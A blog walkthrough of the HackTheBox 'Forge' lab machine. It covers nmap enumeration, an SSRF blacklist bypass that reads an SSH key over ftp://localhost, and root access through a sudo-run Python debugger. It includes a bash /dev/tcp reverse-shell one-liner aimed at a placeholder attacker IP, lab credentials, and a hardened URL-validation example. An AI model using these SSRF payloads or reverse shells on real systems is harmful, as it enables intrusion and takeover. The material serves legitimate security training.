In this post, I would like to share a walkthrough of the Forge Machine from HackTheBox
This room is rated as a medium-difficulty machine on HackTheBox.
Source: Hack the Box
What will you gain from the Forge machine?
For the user flag, you will execute some SSRF attack on the website to fetch any useful information from the server
As for the root flag, you need to run some PDB Python code where it is coming from the SUID file
Once we have started the VPN connection (the configuration file is downloaded from HackTheBox), we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -Pn
# Nmap 7.91 scan initiated Sat Sep 11 23:31:29 2021 as: nmap -sV -sC -oA intial -Pn 10.129.210.60
Nmap scan report for 10.129.210.60
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: Host: 10.129.210.60; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 11 23:32:11 2021 -- 1 IP address (1 host up) scanned in 42.51 seconds
The scan shows a few ports of interest:
- 21 – ftp (filtered)
- 22 – ssh
- 80 – http (redirects to http://forge.htb, so add that name to /etc/hosts)
Let’s try to access the website interface
Nothing of interest here except the “Upload an Image” page.
Before accessing the “Upload an Image”, we can enumerate the directory that can be found on the original domain.
However, there is no interesting directory that we can access
On the “Upload an Image” page, there are two functions: Upload local file and Upload from URL.
I have tried to upload some random files and received responses as shown above.
After a while, I managed to get some useful files from forge.htb/announcement
We got the link and let’s try to download on our machine.
Inside the file, we gather a lot of useful information, such as credentials and a list of ports that are open on the machine.
I tried to access the machine via FTP but, sadly, hit a dead end there.
Being stuck on the FTP access, I suspected there might be a subdomain for the machine. Let’s enumerate subdomains (if any) with gobuster’s vhost mode.
After a few minutes, we notice admin.forge.htb, which responds with status 200.
Sadly, it only shows the text “Only localhost is allowed!”, so we are stuck again.
Gaining Privileges Access
In the Burp Suite request for the Upload function, I notice the parameters (url=test.com&remote=1) after SoC-GPC.
Let’s do some research on the attack which I believe is an SSRF attack
Let’s review what we have obtained so far:
- Subdomain: admin.forge.htb (only localhost is allowed)
- ftp, ftps, http and https are open on the machine, but only reachable from localhost
- Credentials (username=user, password=heightofsecurity123!)
SSRF attack on forge.htb
Let’s apply the SSRF technique we learned from portswigger.net to the website, using the request captured in Burp Suite.
We can insert the payload into the field shown above.
The payload would be something like http://admin.FORGE.HTB/upload?u=ftp://user:firstname.lastname@example.org/.ssh/id_rsa&remote=1 (here I try to obtain the SSH id_rsa).
After inspecting the request in Burp Suite, we send it to Repeater to understand the flow of the process. However, we get an error: “URL contains a blacklisted address!”
Let’s try changing the subdomain’s case to ADMIN.FORGE.htb and using other replacements for localhost, such as 127.0.0.3.
Voila! Finally, we got the link to download something from the machine.
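As an added illustration (not code from the original post or from the box), the following shows why the blacklist above was bypassable: a case-sensitive substring match on the raw URL misses ADMIN.FORGE.htb and 127.0.0.3, whereas a check that parses the URL, normalises the host and rejects loopback/private addresses after resolution blocks both. The blacklist entries and the resolver hook are assumptions made for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed blacklist that mirrors the behaviour seen on the box (assumption).
BLACKLIST = ("localhost", "127.0.0.1", "admin.forge.htb")


def naive_is_blocked(url: str) -> bool:
    """Case-sensitive substring match on the raw URL: the kind of check the
    walkthrough bypassed with ADMIN.FORGE.htb and 127.0.0.3."""
    return any(bad in url for bad in BLACKLIST)


def hardened_is_blocked(url: str, resolver=socket.gethostbyname) -> bool:
    """Parse the URL, normalise the host, resolve it, and block anything that is
    not a plain public address. `resolver` is injectable so tests run offline."""
    parts = urlsplit(url)
    # Only allow schemes the upload feature actually needs; ftp:// to localhost
    # was the path used to read the SSH key.
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True
    # urlsplit already lowercases the host and strips user:pass@ userinfo.
    host = parts.hostname
    if host == "localhost" or host == "forge.htb" or host.endswith(".forge.htb"):
        return True
    try:
        addr = ipaddress.ip_address(resolver(host))
    except (socket.gaierror, ValueError):
        return True  # unresolvable or malformed: fail closed
    # 127.0.0.3 is loopback too (whole 127.0.0.0/8), as are RFC1918 and link-local.
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast)
```

Resolving once and fetching later still leaves a DNS-rebinding window, so the fetcher should also connect to the resolved address rather than re-resolving the name.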
Let’s retrieve the file using wget so that we can read the content of the file.
After multiple tries, we can retrieve the ssh id_rsa
Let’s access the machine via SSH using the id_rsa we obtained previously.
Maintaining Privileges Access on Forge Machine
At last, we are able to access the machine.
You can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
In order to escalate to root privileges, we need to find a file we can run with elevated rights. To find it, we can run a simple command such as “sudo -l“.
We need to understand that file by reading its contents. I notice there’s a password (secretadminpassword) that we might need later.
Without further ado, let’s run the file; I notice the output looks a lot like nc listening for a connection.
There might be a way to get a response from the machine.
Let’s try to open another ssh session on a different terminal.
Let’s telnet to localhost on the port printed by the file. Oh wow! It works and asks for the secret password, which should be the one we found inside the file.
Gotcha! Now, let’s enter any character that is not one of the options listed here.
We were able to get a response on the SUID file. From my experience, PDB might be a Python Debugger
However, it doesn’t do any harm to double-check on the internet
It’s a Python Debugger as I expected.
Before executing any Python code in PDB, we need to start our nc listener.
Let’s run a simple python code that will get a reverse shell connection back to us.
For instance, the code could look like this (replace <Your IP> and <Port> with your listener’s address and port):
import os
os.system("bash -c 'bash -i >& /dev/tcp/<Your IP>/<Port> 0>&1'")
Success! We now have a root Reverse Shell Connection back to us
As usual, we can read the root flag by executing the “cat /root/root.txt” command
Happy Learning Guys!
The root hash from /etc/shadow can be used to unlock and read the official write-up.